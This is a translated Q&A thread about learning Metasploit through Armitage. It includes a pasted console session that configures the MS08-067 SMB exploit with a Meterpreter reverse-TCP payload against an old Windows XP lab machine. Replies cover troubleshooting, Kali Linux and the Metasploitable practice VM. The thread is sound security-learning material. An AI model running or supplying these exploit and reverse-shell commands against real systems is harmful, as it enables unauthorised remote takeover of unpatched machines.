2013-12-18 3 views
0

Я изучаю фреймворк Metasploit, начиная с Armitage, чтобы получить общее представление о структуре и т. Д. Я пытался взломать старую sp2 Windowx XP у меня есть, когда я пытаюсь запустить подвиги я получаю этоBacktrack 5 Armitage MSF

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130 
LHOST => 192.168.18.130 
msf exploit(ms08_067_netapi) > set RPORT 445 
RPORT => 445 
msf exploit(ms08_067_netapi) > set LPORT 13592 
LPORT => 13592 
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11 
RHOST => 10.0.0.11 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER 
SMBPIPE => BROWSER 
msf exploit(ms08_067_netapi) > set TARGET 0 
TARGET => 0 
msf exploit(ms08_067_netapi) > exploit -j 
[*] Exploit running as background job. 
[*] Started reverse handler on 192.168.18.130:13592 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 

Я не получаем никаких ошибок, но киоски там и не выполняет эксплойт.

ответ

1

Похоже, что эксплойт не работает с версией Windows. Возможно, вы можете попробовать другой, что-то более простое. Когда были созданы эти подвиги? Вы абсолютно уверены, что они не загружены в вашу версию Windows?

Если вы хотите узнать что-нибудь из запуска сценариев эксплойта, написанных другими, вы должны начать отладку и попытаться понять, что делает скрипт. Найдите, что именно делает скрипт после того, как он говорит Attempting to trigger the vulnerability и попытайтесь выяснить, почему он может не работать. Здесь слишком много возможностей для размышлений.

0

Я написал Armitage. Вот несколько вещей, чтобы иметь в виде:

  • ms08_067_netapi является надежным использовать против непропатченных систем Windows XP. Однако есть много вещей, которые могут пойти не так, как с удаленным эксплойтом. Попробуйте перезагрузить целевую систему и убедитесь, что брандмауэр на базе хоста отключен. Если он все еще не работает, возможно, ваша система XP исправлена. shrug

  • Я заметил, что название этого сообщения SO относится к BackTrack Linux. Armitage больше не поддерживается в BackTrack Linux. В апреле 2013 года Metasploit Framework провела серьезный сдвиг в зависимости от среды BackTrack Linux. Подумайте о переходе на Kali Linux. Это преемник BackTrack Linux.

Google для Kali Linux [Я не имею «репутации» точки, чтобы дать вам больше, чем две ссылки]

  • Лучший «первой мишенью» для Армитаж и Metasploit Framework является Metasploitable , Это бесплатная виртуальная машина Linux, предоставленная командой Metasploit. Он имеет несколько уязвимостей и неправильных конфигураций, встроенных в него. Она доступна для скачивания здесь:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • Я написал Приступая к работе с Armitage учебника. Это руководство проведет вас через несколько атак против Metasploitable виртуальной машины:

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

+0

Благодаря человеку, я обязательно посмотрите на эти учебники. Я пытался использовать Kali раньше, но что-то не совсем правильно, когда я его использую. Но я попытаюсь заставить себя продолжать пытаться. – Sloth

Смежные вопросы